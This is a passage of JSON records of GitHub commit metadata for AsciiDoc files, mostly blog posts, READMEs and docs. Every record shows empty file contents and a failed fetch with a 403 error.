{"commit":"e0aead2f10458be83edccd787c3ac24426b53bc8","subject":"Update 
2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3365ba3caba9bee3a04c303efb550f8b2411c42c","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31d70dec99cf12510387e5c87f39d2bb4498e027","subject":"Adding doc guidelines topic","message":"Adding doc guidelines topic\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"doc_guidelines.adoc","new_file":"doc_guidelines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9928a79134668fc0672b735abbd291a8f3dc589c","subject":"Create datasource.asciidoc","message":"Create datasource.asciidoc","repos":"apaolini\/nagios-plugin-jbossas7,aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"datasource.asciidoc","new_file":"datasource.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65ae6f204c751c09bd88a855994204d1e7e9b004","subject":"zsh: Add a readme","message":"zsh: Add a readme\n\nThere are already a few intricacies to this configuration. 
Because one\nof the tracked files is supposed to house secrets, there are some steps\nthe user has to take, which I cannot track via git.\n\nThis might change in the future, if I ever decide to provide some kind\nof installation script or a Makefile, but at the moment the user has to\nrun some commands by hand.\n\nThus it is imperative to have a readme for this configuration if the\nuser wants to make full use of the configuration's features.\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88a61d3d57f22a214c32a8c343c2dcb5bc88d3e1","subject":"Adding overview for docsite","message":"Adding overview for docsite\n","repos":"vaadin\/angular2-polymer,platosha\/angular-polymer,platosha\/angular-polymer,platosha\/angular-polymer,vaadin\/angular2-polymer","old_file":"docs\/overview.adoc","new_file":"docs\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b0993fa7030e53d5abc21c5ed74570cb3bada6b","subject":"job: #11367 Introducing note for changes to the MM for WASL.","message":"job: #11367 Introducing note for changes to the MM for WASL.\n","repos":"rmulvey\/mc,cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc,xtuml\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,rmulvey\/mc","old_file":"doc\/notes\/11444_wasl\/11367_wasl_mm_int.adoc","new_file":"doc\/notes\/11444_wasl\/11367_wasl_mm_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17332c351d49fbe8d496e6bb13c7fe2fc2781346","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03d729bf468782fb994e9463e95ecbfd5a81a470","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"155d46b6cc314fe92b31fa04402ff45e38cce8a0","subject":"Well, perhaps it only needs to be escaped at the 
beginning","message":"Well, perhaps it only needs to be escaped at the beginning\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"14de8ac579af24d6033ca7c88d80f7d7860dd6d6","subject":"Updating stylistic highlighting of class names therein readme.asciidoc","message":"Updating stylistic highlighting of class names therein readme.asciidoc\n","repos":"lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,brechin\/hypatia,brechin\/hypatia","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a1f72cc47895501a7410512021ea3b84a018de2","subject":"Update 2016-07-24-Guardians-of-the-Galaxy-Mission-BREAKOUT-announced.adoc","message":"Update 2016-07-24-Guardians-of-the-Galaxy-Mission-BREAKOUT-announced.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-07-24-Guardians-of-the-Galaxy-Mission-BREAKOUT-announced.adoc","new_file":"_posts\/2016-07-24-Guardians-of-the-Galaxy-Mission-BREAKOUT-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84cfda4b3f7eb5a4b001f1cca9edfe6808d6bbfa","subject":"Not XHTML but HTML in XML syntax","message":"Not XHTML but HTML in XML syntax\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c4e6d57a00bc9fd00204ff7d4c400a94d6dd4ff","subject":"HAlerts tutorial lesson 6 announcement","message":"HAlerts tutorial lesson 6 announcement\n","repos":"objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/04\/27\/hawkular-alerting-tutorial-l6.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/04\/27\/hawkular-alerting-tutorial-l6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cf35c7f95be1a70967494d7ef4876ead9e0c2e2","subject":"Minor change","message":"Minor change\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/08-install-mysql.adoc","new_file":"src\/sections\/08-install-mysql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf54f3a672c0aef6ca073163fa01a88d09cd0e4e","subject":"Update 2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc","message":"Update 2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc","new_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Windows-to-create-on-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a830759a96082592fb0c0810a37cf7fff61719f","subject":"Update 20161110-1232-showoff-zone.adoc","message":"Update 20161110-1232-showoff-zone.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1232-showoff-zone.adoc","new_file":"_posts\/20161110-1232-showoff-zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a6446b081aec7f6e516dce6d80dd30c48954ad0","subject":"Update 2017-06-13-Making-a-change.adoc","message":"Update 2017-06-13-Making-a-change.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Making-a-change.adoc","new_file":"_posts\/2017-06-13-Making-a-change.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0ac010510634d48d8a0c5e02daca95b26489bfd","subject":"Update 2017-09-03-Your-Blog-title.adoc","message":"Update 2017-09-03-Your-Blog-title.adoc","repos":"dvmoomoodv\/hubpress.io,dvmoomoodv\/hubpress.io,dvmoomoodv\/hubpress.io,dvmoomoodv\/hubpress.io","old_file":"_posts\/2017-09-03-Your-Blog-title.adoc","new_file":"_posts\/2017-09-03-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dvmoomoodv\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1cae2de23e610c315ee28ed61a55beac3e45816","subject":"Update 2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","message":"Update 
2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","new_file":"_posts\/2015-04-15-Empezando-por-el-principio-Nuestro-banco-de-trabajo-22.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a90df5fd89a995b57c25aca5f7612c439ab1415","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d082614bee33efcf91377dd8add4189f5e4db243","subject":"Update 2017-02-25-image-File-Reader.adoc","message":"Update 2017-02-25-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-25-image-File-Reader.adoc","new_file":"_posts\/2017-02-25-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25b6a946f7c34fcc015d4706a58704c9e87383c9","subject":"Elementi nel preambolo","message":"Elementi nel preambolo\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"sintassi.adoc","new_file":"sintassi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"01cf76293303c21ea7156e582f370145cb1a43fa","subject":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","message":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","new_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2070dae58525df02ad0b9ea647d54191d129b218","subject":"start the serverless docs","message":"start the serverless 
docs\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/topic\/serverless.adoc","new_file":"docs\/src\/main\/asciidoc\/topic\/serverless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4fabfa7477923c359beb2e49dcc8e8e95d0b5a71","subject":"Update 2018-05-16-why-not-wrote.adoc","message":"Update 2018-05-16-why-not-wrote.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"_posts\/2018-05-16-why-not-wrote.adoc","new_file":"_posts\/2018-05-16-why-not-wrote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e86e046ac5c0344ec30d474e92b1792b3a8b2685","subject":"#245 Added programmatic API documentation","message":"#245 Added programmatic API documentation\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/picocli-3.0-programmatic-api.adoc","new_file":"docs\/picocli-3.0-programmatic-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"effe4efc0722e5aedb7f153aa5b80b2c9ca2dded","subject":"Update 2018-02-05-.adoc","message":"Update 2018-02-05-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-.adoc","new_file":"_posts\/2018-02-05-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"966f4bc9a7ba2286023ce319c36653afe37f5fd6","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e896e9bd1cf2b46895e4fef44064af7df304ac5c","subject":"Publish 2014-05-0-Query-parameters-talk-slides.adoc","message":"Publish 2014-05-0-Query-parameters-talk-slides.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"2014-05-0-Query-parameters-talk-slides.adoc","new_file":"2014-05-0-Query-parameters-talk-slides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36829683e3829e35a9957eae9a82ba55ecf91891","subject":"y2b create post 
Apple iPhone X + iPhone 8 Event Livestream 2017 (Part 1)","message":"y2b create post Apple iPhone X + iPhone 8 Event Livestream 2017 (Part 1)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-12-Apple-iPhone-X--iPhone-8-Event-Livestream-2017-Part-1.adoc","new_file":"_posts\/2017-09-12-Apple-iPhone-X--iPhone-8-Event-Livestream-2017-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecb110284363a0ce6632b654cf65075009ad063a","subject":"Update 2015-02-18-Coder-module.adoc","message":"Update 2015-02-18-Coder-module.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2015-02-18-Coder-module.adoc","new_file":"_posts\/2015-02-18-Coder-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51af149f015d1fa464cbddd873157ababe1e172a","subject":"Added IoCs for mekotio","message":"Added IoCs for mekotio\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"mekotio\/README.adoc","new_file":"mekotio\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"19a85b58ba3469a4ecabde5e4dbcd35644068a6d","subject":"Update 2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","message":"Update 2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","new_file":"_posts\/2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7431c87ef3ff5989936ad92ff2169c4b043450a2","subject":"create post Unlock Any MacBook Without The Password","message":"create post Unlock Any MacBook Without The Password","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unlock-Any-MacBook-Without-The-Password.adoc","new_file":"_posts\/2018-02-26-Unlock-Any-MacBook-Without-The-Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63c299f812562239a1678ec9d26ee6b3f7819fef","subject":"apidoc notes","message":"apidoc 
notes\n","repos":"lillian-lemmer\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,Applemann\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"sphinx-source\/readme.asciidoc","new_file":"sphinx-source\/readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32606a6b687c0a8b46ec1172b464c69b9c11d3f2","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6d1d7d55e322a5e4689b81e63e6720274fef717","subject":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97cb16d93ccef0c0f8ff2416abbef3609e14d682","subject":"Update 2016-08-11-2016-08-10.adoc","message":"Update 2016-08-11-2016-08-10.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-11-2016-08-10.adoc","new_file":"_posts\/2016-08-11-2016-08-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5e62b2dac58fcb4a9bf735b28c104d8da0e6df8","subject":"Update index.adoc","message":"Update index.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e14fc294449997999e6d7c8a8e39b539112d6b92","subject":"y2b create post THE CRAZIEST SWISS ARMY KNIFE","message":"y2b create post THE CRAZIEST SWISS ARMY 
KNIFE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-29-THE-CRAZIEST-SWISS-ARMY-KNIFE.adoc","new_file":"_posts\/2016-06-29-THE-CRAZIEST-SWISS-ARMY-KNIFE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f8a83e7b4b94571e8321f22255a59b2136bfbae","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22d39f85dc663dbf197b7ebe35ab1e10a22c53f","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e7b911b0ba3a5c6fe62804ac642f1d95cb9cc57","subject":"Correct readme","message":"Correct readme\n\nChange-Id: Ia9e0ffd41322e58f8f3aeabc33a6134e451b5492\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2012860a86b9c7c03e9416f2f2a003b13d7d903","subject":"Update README","message":"Update 